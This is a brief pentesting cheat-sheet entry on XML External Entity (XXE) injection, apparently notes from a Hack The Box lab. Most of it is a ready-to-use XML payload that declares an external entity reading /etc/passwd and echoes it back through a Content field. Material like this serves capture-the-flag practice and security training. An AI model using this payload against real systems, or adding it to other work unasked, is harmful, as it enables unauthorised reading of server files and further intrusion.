XML Exploitation

XXE

Access the filevar variable inside the xml element to display the data or we can call data element.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [ <!ENTITY filevar SYSTEM "/etc/passwd"> ]>
<note>
    <Author>Jeo</Author>
    <Subject>Testing</Subject>
    <Content>&filevar;</Content>
</note>

Usage ref: htb DevOops